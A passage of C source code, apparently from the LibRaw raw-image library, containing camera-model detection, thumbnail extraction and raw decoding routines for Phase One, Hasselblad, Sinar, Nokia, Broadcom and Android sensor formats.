if (histo[often[i]] < 200)
return 0;
return 1;
}
/*
Returns 1 for a Coolpix 2100, 0 for anything else.
*/
int CLASS nikon_e2100()
{
uchar t[12];
int i;
fseek (ifp, 0, SEEK_SET);
for (i=0; i < 1024; i++) {
fread (t, 1, 12, ifp);
if (((t[2] & t[4] & t[7] & t[9]) >> 4
& t[1] & t[6] & t[8] & t[11] & 3) != 3)
return 0;
}
return 1;
}
void CLASS nikon_3700()
{
int bits, i;
uchar dp[24];
static const struct {
int bits;
char t_make[12], t_model[15];
} table[] = {
{ 0x00, "Pentax", "Optio 33WR" },
{ 0x03, "Nikon", "E3200" },
{ 0x32, "Nikon", "E3700" },
{ 0x33, "Olympus", "C740UZ" } };
fseek (ifp, 3072, SEEK_SET);
fread (dp, 1, 24, ifp);
bits = (dp[8] & 3) << 4 | (dp[20] & 3);
for (i=0; i < sizeof table / sizeof *table; i++)
if (bits == table[i].bits) {
strcpy (make, table[i].t_make );
strcpy (model, table[i].t_model);
}
}
/*
Separates a Minolta DiMAGE Z2 from a Nikon E4300.
*/
int CLASS minolta_z2()
{
int i, nz;
char tail[424];
fseek (ifp, -sizeof tail, SEEK_END);
fread (tail, 1, sizeof tail, ifp);
for (nz=i=0; i < sizeof tail; i++)
if (tail[i]) nz++;
return nz > 20;
}
//@end COMMON
void CLASS jpeg_thumb();
//@out COMMON
void CLASS ppm_thumb()
{
char *thumb;
thumb_length = thumb_width*thumb_height*3;
thumb = (char *) malloc (thumb_length);
merror (thumb, "ppm_thumb()");
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
fread (thumb, 1, thumb_length, ifp);
fwrite (thumb, 1, thumb_length, ofp);
free (thumb);
}
void CLASS ppm16_thumb()
{
int i;
char *thumb;
thumb_length = thumb_width*thumb_height*3;
thumb = (char *) calloc (thumb_length, 2);
merror (thumb, "ppm16_thumb()");
read_shorts ((ushort *) thumb, thumb_length);
for (i=0; i < thumb_length; i++)
thumb[i] = ((ushort *) thumb)[i] >> 8;
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
fwrite (thumb, 1, thumb_length, ofp);
free (thumb);
}
void CLASS layer_thumb()
{
int i, c;
char *thumb, map[][4] = { "012","102" };
colors = thumb_misc >> 5 & 7;
thumb_length = thumb_width*thumb_height;
thumb = (char *) calloc (colors, thumb_length);
merror (thumb, "layer_thumb()");
fprintf (ofp, "P%d\n%d %d\n255\n",
5 + (colors >> 1), thumb_width, thumb_height);
fread (thumb, thumb_length, colors, ifp);
for (i=0; i < thumb_length; i++)
FORCC putc (thumb[i+thumb_length*(map[thumb_misc >> 8][c]-'0')], ofp);
free (thumb);
}
void CLASS rollei_thumb()
{
unsigned i;
ushort *thumb;
thumb_length = thumb_width * thumb_height;
thumb = (ushort *) calloc (thumb_length, 2);
merror (thumb, "rollei_thumb()");
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
read_shorts (thumb, thumb_length);
for (i=0; i < thumb_length; i++) {
putc (thumb[i] << 3, ofp);
putc (thumb[i] >> 5 << 2, ofp);
putc (thumb[i] >> 11 << 3, ofp);
}
free (thumb);
}
void CLASS rollei_load_raw()
{
uchar pixel[10];
unsigned iten = 0, isix, i, buffer = 0, todo[16];
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width > 32767 || raw_height > 32767)
throw LIBRAW_EXCEPTION_IO_BADFILE;
#endif
unsigned maxpixel = raw_width*(raw_height+7);
isix = raw_width * raw_height * 5 / 8;
while (fread (pixel, 1, 10, ifp) == 10) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (i=0; i < 10; i+=2) {
todo[i] = iten++;
todo[i+1] = pixel[i] << 8 | pixel[i+1];
buffer = pixel[i] >> 2 | buffer << 6;
}
for ( ; i < 16; i+=2) {
todo[i] = isix++;
todo[i+1] = buffer >> (14-i)*5;
}
for (i = 0; i < 16; i += 2)
if(todo[i] < maxpixel)
raw_image[todo[i]] = (todo[i + 1] & 0x3ff);
else
derror();
}
maximum = 0x3ff;
}
int CLASS raw (unsigned row, unsigned col)
{
return (row < raw_height && col < raw_width) ? RAW(row,col) : 0;
}
void CLASS phase_one_flat_field (int is_float, int nc)
{
ushort head[8];
unsigned wide, high, y, x, c, rend, cend, row, col;
float *mrow, num, mult[4];
read_shorts (head, 8);
if (head[2] * head[3] * head[4] * head[5] == 0) return;
wide = head[2] / head[4] + (head[2] % head[4] != 0);
high = head[3] / head[5] + (head[3] % head[5] != 0);
mrow = (float *) calloc (nc*wide, sizeof *mrow);
merror (mrow, "phase_one_flat_field()");
for (y=0; y < high; y++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (x=0; x < wide; x++)
for (c=0; c < nc; c+=2) {
num = is_float ? getreal(11) : get2()/32768.0;
if (y==0) mrow[c*wide+x] = num;
else mrow[(c+1)*wide+x] = (num - mrow[c*wide+x]) / head[5];
}
if (y==0) continue;
rend = head[1] + y*head[5];
for (row = rend-head[5];
row < raw_height && row < rend &&
row < head[1]+head[3]-head[5]; row++) {
for (x=1; x < wide; x++) {
for (c=0; c < nc; c+=2) {
mult[c] = mrow[c*wide+x-1];
mult[c+1] = (mrow[c*wide+x] - mult[c]) / head[4];
}
cend = head[0] + x*head[4];
for (col = cend-head[4];
col < raw_width &&
col < cend && col < head[0]+head[2]-head[4]; col++) {
c = nc > 2 ? FC(row-top_margin,col-left_margin) : 0;
if (!(c & 1)) {
c = RAW(row,col) * mult[c];
RAW(row,col) = LIM(c,0,65535);
}
for (c=0; c < nc; c+=2)
mult[c] += mult[c+1];
}
}
for (x=0; x < wide; x++)
for (c=0; c < nc; c+=2)
mrow[c*wide+x] += mrow[(c+1)*wide+x];
}
}
free (mrow);
}
int CLASS phase_one_correct()
{
unsigned entries, tag, data, save, col, row, type;
int len, i, j, k, cip, val[4], dev[4], sum, max;
int head[9], diff, mindiff=INT_MAX, off_412=0;
/* static */ const signed char dir[12][2] =
{ {-1,-1}, {-1,1}, {1,-1}, {1,1}, {-2,0}, {0,-2}, {0,2}, {2,0},
{-2,-2}, {-2,2}, {2,-2}, {2,2} };
float poly[8], num, cfrac, frac, mult[2], *yval[2]={NULL,NULL};
ushort *xval[2];
int qmult_applied = 0, qlin_applied = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if (!meta_length)
#else
if (half_size || !meta_length)
#endif
return 0;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Phase One correction...\n"));
#endif
fseek (ifp, meta_offset, SEEK_SET);
order = get2();
fseek (ifp, 6, SEEK_CUR);
fseek (ifp, meta_offset+get4(), SEEK_SET);
entries = get4(); get4();
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
while (entries--) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
tag = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, meta_offset+data, SEEK_SET);
if (tag == 0x419) { /* Polynomial curve */
for (get4(), i=0; i < 8; i++)
poly[i] = getreal(11);
poly[3] += (ph1.tag_210 - poly[7]) * poly[6] + 1;
for (i=0; i < 0x10000; i++) {
num = (poly[5]*i + poly[3])*i + poly[1];
curve[i] = LIM(num,0,65535);
} goto apply; /* apply to right half */
} else if (tag == 0x41a) { /* Polynomial curve */
for (i=0; i < 4; i++)
poly[i] = getreal(11);
for (i=0; i < 0x10000; i++) {
for (num=0, j=4; j--; )
num = num * i + poly[j];
curve[i] = LIM(num+i,0,65535);
} apply: /* apply to whole image */
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (tag & 1)*ph1.split_col; col < raw_width; col++)
RAW(row,col) = curve[RAW(row,col)];
}
} else if (tag == 0x400) { /* Sensor defects */
while ((len -= 8) >= 0) {
col = get2();
row = get2();
type = get2(); get2();
if (col >= raw_width) continue;
if (type == 131 || type == 137) /* Bad column */
for (row=0; row < raw_height; row++)
if (FC(row-top_margin,col-left_margin) == 1) {
for (sum=i=0; i < 4; i++)
sum += val[i] = raw (row+dir[i][0], col+dir[i][1]);
for (max=i=0; i < 4; i++) {
dev[i] = abs((val[i] << 2) - sum);
if (dev[max] < dev[i]) max = i;
}
RAW(row,col) = (sum - val[max])/3.0 + 0.5;
} else {
for (sum=0, i=8; i < 12; i++)
sum += raw (row+dir[i][0], col+dir[i][1]);
RAW(row,col) = 0.5 + sum * 0.0732233 +
(raw(row,col-2) + raw(row,col+2)) * 0.3535534;
}
else if (type == 129) { /* Bad pixel */
if (row >= raw_height) continue;
j = (FC(row-top_margin,col-left_margin) != 1) * 4;
for (sum=0, i=j; i < j+8; i++)
sum += raw (row+dir[i][0], col+dir[i][1]);
RAW(row,col) = (sum + 4) >> 3;
}
}
} else if (tag == 0x401) { /* All-color flat fields */
phase_one_flat_field (1, 2);
} else if (tag == 0x416 || tag == 0x410) {
phase_one_flat_field (0, 2);
} else if (tag == 0x40b) { /* Red+blue flat field */
phase_one_flat_field (0, 4);
} else if (tag == 0x412) {
fseek (ifp, 36, SEEK_CUR);
diff = abs (get2() - ph1.tag_21a);
if (mindiff > diff) {
mindiff = diff;
off_412 = ftell(ifp) - 38;
}
} else if (tag == 0x41f && !qlin_applied) { /* Quadrant linearization */
ushort lc[2][2][16], ref[16];
int qr, qc;
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
for (i = 0; i < 16; i++)
lc[qr][qc][i] = get4();
for (i = 0; i < 16; i++) {
int v = 0;
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
v += lc[qr][qc][i];
ref[i] = (v + 2) >> 2;
}
for (qr = 0; qr < 2; qr++) {
for (qc = 0; qc < 2; qc++) {
int cx[19], cf[19];
for (i = 0; i < 16; i++) {
cx[1+i] = lc[qr][qc][i];
cf[1+i] = ref[i];
}
cx[0] = cf[0] = 0;
cx[17] = cf[17] = ((unsigned int)ref[15] * 65535) / lc[qr][qc][15];
cf[18] = cx[18] = 65535;
cubic_spline(cx, cf, 19);
for (row = (qr ? ph1.split_row : 0);
row < (qr ? raw_height : ph1.split_row); row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (qc ? ph1.split_col : 0);
col < (qc ? raw_width : ph1.split_col); col++)
RAW(row,col) = curve[RAW(row,col)];
}
}
}
qlin_applied = 1;
} else if (tag == 0x41e && !qmult_applied) { /* Quadrant multipliers */
float qmult[2][2] = { { 1, 1 }, { 1, 1 } };
get4(); get4(); get4(); get4();
qmult[0][0] = 1.0 + getreal(11);
get4(); get4(); get4(); get4(); get4();
qmult[0][1] = 1.0 + getreal(11);
get4(); get4(); get4();
qmult[1][0] = 1.0 + getreal(11);
get4(); get4(); get4();
qmult[1][1] = 1.0 + getreal(11);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
i = qmult[row >= ph1.split_row][col >= ph1.split_col] * RAW(row,col);
RAW(row,col) = LIM(i,0,65535);
}
}
qmult_applied = 1;
} else if (tag == 0x431 && !qmult_applied) { /* Quadrant combined */
ushort lc[2][2][7], ref[7];
int qr, qc;
for (i = 0; i < 7; i++)
ref[i] = get4();
for (qr = 0; qr < 2; qr++)
for (qc = 0; qc < 2; qc++)
for (i = 0; i < 7; i++)
lc[qr][qc][i] = get4();
for (qr = 0; qr < 2; qr++) {
for (qc = 0; qc < 2; qc++) {
int cx[9], cf[9];
for (i = 0; i < 7; i++) {
cx[1+i] = ref[i];
cf[1+i] = ((unsigned) ref[i] * lc[qr][qc][i]) / 10000;
}
cx[0] = cf[0] = 0;
cx[8] = cf[8] = 65535;
cubic_spline(cx, cf, 9);
for (row = (qr ? ph1.split_row : 0);
row < (qr ? raw_height : ph1.split_row); row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col = (qc ? ph1.split_col : 0);
col < (qc ? raw_width : ph1.split_col); col++)
RAW(row,col) = curve[RAW(row,col)];
}
}
}
qmult_applied = 1;
qlin_applied = 1;
}
fseek (ifp, save, SEEK_SET);
}
if (off_412) {
fseek (ifp, off_412, SEEK_SET);
for (i=0; i < 9; i++) head[i] = get4() & 0x7fff;
yval[0] = (float *) calloc (head[1]*head[3] + head[2]*head[4], 6);
merror (yval[0], "phase_one_correct()");
yval[1] = (float *) (yval[0] + head[1]*head[3]);
xval[0] = (ushort *) (yval[1] + head[2]*head[4]);
xval[1] = (ushort *) (xval[0] + head[1]*head[3]);
get2();
for (i=0; i < 2; i++)
for (j=0; j < head[i+1]*head[i+3]; j++)
yval[i][j] = getreal(11);
for (i=0; i < 2; i++)
for (j=0; j < head[i+1]*head[i+3]; j++)
xval[i][j] = get2();
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
cfrac = (float) col * head[3] / raw_width;
cfrac -= cip = cfrac;
num = RAW(row,col) * 0.5;
for (i=cip; i < cip+2; i++) {
for (k=j=0; j < head[1]; j++)
if (num < xval[0][k = head[1]*i+j]) break;
frac = (j == 0 || j == head[1]) ? 0 :
(xval[0][k] - num) / (xval[0][k] - xval[0][k-1]);
mult[i-cip] = yval[0][k-1] * frac + yval[0][k] * (1-frac);
}
i = ((mult[0] * (1-cfrac) + mult[1] * cfrac) * row + num) * 2;
RAW(row,col) = LIM(i,0,65535);
}
}
free (yval[0]);
}
#ifdef LIBRAW_LIBRARY_BUILD
}
catch (...)
{
if(yval[0]) free(yval[0]);
return LIBRAW_CANCELLED_BY_CALLBACK;
}
#endif
return 0;
}
void CLASS phase_one_load_raw()
{
int a, b, i;
ushort akey, bkey, t_mask;
fseek (ifp, ph1.key_off, SEEK_SET);
akey = get2();
bkey = get2();
t_mask = ph1.format == 1 ? 0x5555:0x1354;
#ifdef LIBRAW_LIBRARY_BUILD
if (ph1.black_col || ph1.black_row )
{
imgdata.rawdata.ph1_cblack = (short(*)[2])calloc(raw_height*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_cblack,"phase_one_load_raw()");
imgdata.rawdata.ph1_rblack = (short(*)[2])calloc(raw_width*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_rblack,"phase_one_load_raw()");
if (ph1.black_col)
{
fseek (ifp, ph1.black_col, SEEK_SET);
read_shorts ((ushort *)imgdata.rawdata.ph1_cblack[0], raw_height*2);
}
if (ph1.black_row)
{
fseek (ifp, ph1.black_row, SEEK_SET);
read_shorts ((ushort *) imgdata.rawdata.ph1_rblack[0], raw_width*2);
}
}
#endif
fseek (ifp, data_offset, SEEK_SET);
read_shorts (raw_image, raw_width*raw_height);
if (ph1.format)
for (i=0; i < raw_width*raw_height; i+=2) {
a = raw_image[i+0] ^ akey;
b = raw_image[i+1] ^ bkey;
raw_image[i+0] = (a & t_mask) | (b & ~t_mask);
raw_image[i+1] = (b & t_mask) | (a & ~t_mask);
}
}
unsigned CLASS ph1_bithuff (int nbits, ushort *huff)
{
#ifndef LIBRAW_NOTHREADS
#define bitbuf tls->ph1_bits.bitbuf
#define vbits tls->ph1_bits.vbits
#else
static UINT64 bitbuf=0;
static int vbits=0;
#endif
unsigned c;
if (nbits == -1)
return bitbuf = vbits = 0;
if (nbits == 0) return 0;
if (vbits < nbits) {
bitbuf = bitbuf << 32 | get4();
vbits += 32;
}
c = bitbuf << (64-vbits) >> (64-nbits);
if (huff) {
vbits -= huff[c] >> 8;
return (uchar) huff[c];
}
vbits -= nbits;
return c;
#ifndef LIBRAW_NOTHREADS
#undef bitbuf
#undef vbits
#endif
}
#define ph1_bits(n) ph1_bithuff(n,0)
#define ph1_huff(h) ph1_bithuff(*h,h+1)
void CLASS phase_one_load_raw_c()
{
static const int length[] = { 8,7,6,9,11,10,5,12,14,13 };
int *offset, len[2], pred[2], row, col, i, j;
ushort *pixel;
short (*c_black)[2], (*r_black)[2];
#ifdef LIBRAW_LIBRARY_BUILD
if(ph1.format == 6)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width*3 + raw_height*4, 2);
merror (pixel, "phase_one_load_raw_c()");
offset = (int *) (pixel + raw_width);
fseek (ifp, strip_offset, SEEK_SET);
for (row=0; row < raw_height; row++)
offset[row] = get4();
c_black = (short (*)[2]) (offset + raw_height);
fseek (ifp, ph1.black_col, SEEK_SET);
if (ph1.black_col)
read_shorts ((ushort *) c_black[0], raw_height*2);
r_black = c_black + raw_height;
fseek (ifp, ph1.black_row, SEEK_SET);
if (ph1.black_row)
read_shorts ((ushort *) r_black[0], raw_width*2);
#ifdef LIBRAW_LIBRARY_BUILD
// Copy data to internal copy (ever if not read)
if (ph1.black_col || ph1.black_row )
{
imgdata.rawdata.ph1_cblack = (short(*)[2])calloc(raw_height*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_cblack,"phase_one_load_raw_c()");
memmove(imgdata.rawdata.ph1_cblack,(ushort*)c_black[0],raw_height*2*sizeof(ushort));
imgdata.rawdata.ph1_rblack = (short(*)[2])calloc(raw_width*2,sizeof(ushort));
merror(imgdata.rawdata.ph1_rblack,"phase_one_load_raw_c()");
memmove(imgdata.rawdata.ph1_rblack,(ushort*)r_black[0],raw_width*2*sizeof(ushort));
}
#endif
for (i=0; i < 256; i++)
curve[i] = i*i / 3.969 + 0.5;
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, data_offset + offset[row], SEEK_SET);
ph1_bits(-1);
pred[0] = pred[1] = 0;
for (col=0; col < raw_width; col++) {
if (col >= (raw_width & -8))
len[0] = len[1] = 14;
else if ((col & 7) == 0)
for (i=0; i < 2; i++) {
for (j=0; j < 5 && !ph1_bits(1); j++);
if (j--) len[i] = length[j*2 + ph1_bits(1)];
}
if ((i = len[col & 1]) == 14)
pixel[col] = pred[col & 1] = ph1_bits(16);
else
pixel[col] = pred[col & 1] += ph1_bits(i) + 1 - (1 << (i - 1));
if (pred[col & 1] >> 16) derror();
if (ph1.format == 5 && pixel[col] < 256)
pixel[col] = curve[pixel[col]];
}
#ifndef LIBRAW_LIBRARY_BUILD
for (col=0; col < raw_width; col++) {
int shift = ph1.format == 8? 0: 2;
i = (pixel[col] << shift) - ph1.t_black
+ c_black[row][col >= ph1.split_col]
+ r_black[col][row >= ph1.split_row];
if (i > 0) RAW(row,col) = i;
}
#else
if(ph1.format == 8)
memmove(&RAW(row,0),&pixel[0],raw_width*2);
else
for (col=0; col < raw_width; col++)
RAW(row,col) = pixel[col] << 2;
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = 0xfffc - ph1.t_black;
}
void CLASS hasselblad_load_raw()
{
struct jhead jh;
int shot, row, col, *back[5], len[2], diff[12], pred, sh, f, s, c;
unsigned upix, urow, ucol;
ushort *ip;
if (!ljpeg_start (&jh, 0)) return;
order = 0x4949;
ph1_bits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
back[4] = (int *) calloc (raw_width, 3*sizeof **back);
merror (back[4], "hasselblad_load_raw()");
FORC3 back[c] = back[4] + c*raw_width;
cblack[6] >>= sh = tiff_samples > 1;
shot = LIM(shot_select, 1, tiff_samples) - 1;
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
FORC4 back[(c+3) & 3] = back[c];
for (col=0; col < raw_width; col+=2) {
for (s=0; s < tiff_samples*2; s+=2) {
FORC(2) len[c] = ph1_huff(jh.huff[0]);
FORC(2) {
diff[s+c] = ph1_bits(len[c]);
if ((diff[s+c] & (1 << (len[c]-1))) == 0)
diff[s+c] -= (1 << len[c]) - 1;
if (diff[s+c] == 65535) diff[s+c] = -32768;
}
}
for (s=col; s < col+2; s++) {
pred = 0x8000 + load_flags;
if (col) pred = back[2][s-2];
if (col && row > 1) switch (jh.psv) {
case 11: pred += back[0][s]/2 - back[0][s-2]/2; break;
}
f = (row & 1)*3 ^ ((col+s) & 1);
FORC (tiff_samples) {
pred += diff[(s & 1)*tiff_samples+c];
upix = pred >> sh & 0xffff;
if (raw_image && c == shot)
RAW(row,s) = upix;
if (image) {
urow = row-top_margin + (c & 1);
ucol = col-left_margin - ((c >> 1) & 1);
ip = &image[urow*width+ucol][f];
if (urow < height && ucol < width)
*ip = c < 4 ? upix : (*ip + upix) >> 1;
}
}
back[2][s] = pred;
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...){
free (back[4]);
ljpeg_end (&jh);
throw;
}
#endif
free (back[4]);
ljpeg_end (&jh);
if (image) mix_green = 1;
}
void CLASS leaf_hdr_load_raw()
{
ushort *pixel=0;
unsigned tile=0, r, c, row, col;
if (!filters) {
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width, sizeof *pixel);
merror (pixel, "leaf_hdr_load_raw()");
}
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
FORC(tiff_samples)
for (r=0; r < raw_height; r++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (r % tile_length == 0) {
fseek (ifp, data_offset + 4*tile++, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
}
if (filters && c != shot_select) continue;
if (filters) pixel = raw_image + r*raw_width;
read_shorts (pixel, raw_width);
if (!filters && (row = r - top_margin) < height)
for (col=0; col < width; col++)
image[row*width+col][c] = pixel[col+left_margin];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
if(!filters) free(pixel);
throw;
}
#endif
if (!filters) {
maximum = 0xffff;
raw_color = 1;
free (pixel);
}
}
void CLASS unpacked_load_raw()
{
int row, col, bits=0;
while (1 << ++bits < maximum);
read_shorts (raw_image, raw_width*raw_height);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++)
if ((RAW(row,col) >>= load_flags) >> bits
&& (unsigned) (row-top_margin) < height
&& (unsigned) (col-left_margin) < width) derror();
}
}
void CLASS unpacked_load_raw_reversed()
{
int row, col, bits=0;
while (1 << ++bits < maximum);
for (row=raw_height-1; row >= 0; row--)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
read_shorts (&raw_image[row*raw_width], raw_width);
for (col=0; col < raw_width; col++)
if ((RAW(row,col) >>= load_flags) >> bits
&& (unsigned) (row-top_margin) < height
&& (unsigned) (col-left_margin) < width) derror();
}
}
void CLASS sinar_4shot_load_raw()
{
ushort *pixel;
unsigned shot, row, col, r, c;
if (raw_image) {
shot = LIM (shot_select, 1, 4) - 1;
fseek (ifp, data_offset + shot*4, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
unpacked_load_raw();
return;
}
#ifdef LIBRAW_LIBRARY_BUILD
else if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width, sizeof *pixel);
merror (pixel, "sinar_4shot_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (shot=0; shot < 4; shot++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, data_offset + shot*4, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
for (row=0; row < raw_height; row++) {
read_shorts (pixel, raw_width);
if ((r = row-top_margin - (shot >> 1 & 1)) >= height) continue;
for (col=0; col < raw_width; col++) {
if ((c = col-left_margin - (shot & 1)) >= width) continue;
image[r*width+c][(row & 1)*3 ^ (~col & 1)] = pixel[col];
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free(pixel);
throw;
}
#endif
free (pixel);
mix_green = 1;
}
void CLASS imacon_full_load_raw()
{
int row, col;
if (!image) return;
#ifdef LIBRAW_LIBRARY_BUILD
unsigned short *buf = (unsigned short *)malloc(width*3*sizeof(unsigned short));
merror(buf,"imacon_full_load_raw");
#endif
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
read_shorts(buf,width*3);
unsigned short (*rowp)[4] = &image[row*width];
for (col=0; col < width; col++)
{
rowp[col][0]=buf[col*3];
rowp[col][1]=buf[col*3+1];
rowp[col][2]=buf[col*3+2];
rowp[col][3]=0;
}
#else
for (col=0; col < width; col++)
read_shorts (image[row*width+col], 3);
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
free(buf);
#endif
}
void CLASS packed_load_raw()
{
int vbits=0, bwide, rbits, bite, half, irow, row, col, val, i;
UINT64 bitbuf=0;
bwide = raw_width * tiff_bps / 8;
bwide += bwide & load_flags >> 7;
rbits = bwide * 8 - raw_width * tiff_bps;
if (load_flags & 1) bwide = bwide * 16 / 15;
bite = 8 + (load_flags & 24);
half = (raw_height+1) >> 1;
for (irow=0; irow < raw_height; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
row = irow;
if (load_flags & 2 &&
(row = irow % half * 2 + irow / half) == 1 &&
load_flags & 4) {
if (vbits=0, tiff_compress)
fseek (ifp, data_offset - (-half*bwide & -2048), SEEK_SET);
else {
fseek (ifp, 0, SEEK_END);
fseek (ifp, ftell(ifp) >> 3 << 2, SEEK_SET);
}
}
if(feof(ifp)) throw LIBRAW_EXCEPTION_IO_EOF;
for (col=0; col < raw_width; col++) {
for (vbits -= tiff_bps; vbits < 0; vbits += bite) {
bitbuf <<= bite;
for (i=0; i < bite; i+=8)
bitbuf |= (unsigned) (fgetc(ifp) << i);
}
val = bitbuf << (64-tiff_bps-vbits) >> (64-tiff_bps);
RAW(row,col ^ (load_flags >> 6 & 1)) = val;
if (load_flags & 1 && (col % 10) == 9 && fgetc(ifp) &&
row < height+top_margin && col < width+left_margin) derror();
}
vbits -= rbits;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
ushort raw_stride;
void CLASS parse_broadcom () {
/* This structure is at offset 0xb0 from the 'BRCM' ident. */
struct {
uint8_t umode[32];
uint16_t uwidth;
uint16_t uheight;
uint16_t padding_right;
uint16_t padding_down;
uint32_t unknown_block[6];
uint16_t transform;
uint16_t format;
uint8_t bayer_order;
uint8_t bayer_format;
} header;
header.bayer_order = 0;
fseek (ifp, 0xb0 - 0x20, SEEK_CUR);
fread (&header, 1, sizeof(header), ifp);
raw_stride = ((((((header.uwidth + header.padding_right)*5)+3)>>2) + 0x1f)&(~0x1f));
raw_width = width = header.uwidth;
raw_height = height = header.uheight;
filters = 0x16161616; /* default Bayer order is 2, BGGR */
switch (header.bayer_order) {
case 0: /* RGGB */
filters = 0x94949494;
break;
case 1: /* GBRG */
filters = 0x49494949;
break;
case 3: /* GRBG */
filters = 0x61616161;
break;
}
}
void CLASS broadcom_load_raw() {
uchar *data, *dp;
int rev, row, col, c;
rev = 3 * (order == 0x4949);
data = (uchar *) malloc (raw_stride*2);
merror (data, "broadcom_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data+raw_stride, 1, raw_stride, ifp) < raw_stride) derror();
FORC(raw_stride) data[c] = data[raw_stride+(c ^ rev)];
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
free (data);
}
#endif
void CLASS nokia_load_raw()
{
uchar *data, *dp;
int rev, dwide, row, col, c;
double sum[]={0,0};
rev = 3 * (order == 0x4949);
dwide = (raw_width * 5 + 1) / 4;
data = (uchar *) malloc (dwide*2);
merror (data, "nokia_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (data+dwide, 1, dwide, ifp) < dwide) derror();
FORC(dwide) data[c] = data[dwide+(c ^ rev)];
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...){
free (data);
throw;
}
#endif
free (data);
maximum = 0x3ff;
if (strncmp(make,"OmniVision",10)) return;
row = raw_height/2;
FORC(width-1) {
sum[ c & 1] += SQR(RAW(row,c)-RAW(row+1,c+1));
sum[~c & 1] += SQR(RAW(row+1,c)-RAW(row,c+1));
}
if (sum[1] > sum[0]) filters = 0x4b4b4b4b;
}
void CLASS android_tight_load_raw()
{
uchar *data, *dp;
int bwide, row, col, c;
bwide = -(-5*raw_width >> 5) << 3;
data = (uchar *) malloc (bwide);
merror (data, "android_tight_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data, 1, bwide, ifp) < bwide) derror();
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
free (data);
}
void CLASS android_loose_load_raw()
{
uchar *data, *dp;
int bwide, row, col, c;
UINT64 bitbuf=0;
bwide = (raw_width+5)/6 << 3;
data = (uchar *) malloc (bwide);
merror (data, "android_loose_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data, 1, bwide, ifp) < bwide) derror();
for (dp=data, col=0; col < raw_width; dp+=8, col+=6) {
FORC(8) bitbuf = (bitbuf << 8) | dp[c^7];
FORC(6) RAW(row,col+c) = (bitbuf >> c*10) & 0x3ff;
}
}
free (data);
}
void CLASS canon_rmf_load_raw()
{
int row, col, bits, orow, ocol, c;
#ifdef LIBRAW_LIBRARY_BUILD
int *words = (int*)malloc(sizeof(int)*(raw_width/3+1));
merror(words,"canon_rmf_load_raw");
#endif
